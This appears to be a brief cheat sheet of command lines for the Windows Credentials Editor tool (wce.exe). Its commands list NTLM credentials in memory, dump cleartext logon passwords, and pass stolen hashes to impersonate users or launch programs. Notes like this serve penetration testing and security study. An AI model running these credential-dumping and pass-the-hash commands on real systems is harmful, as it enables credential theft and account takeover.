http://www.ampliasecurity.com/research.html
http://www.ampliasecurity.com/research/wcefaq.html
【list NTLM credentials in memory】
wce.exe
wce.exe -o output.txt
【dump logon cleartext passwords】
wce.exe -w
【change my current NTLM credentials】
wce.exe -s <username>:<domain>:<lmhash>:<nthash>
【create a new logon session and launch a program with new NTLM credentials】
wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
【generate NTLM hashes】
wce.exe -g <cleartext password>
【Safe mode、No injection】
wce.exe -f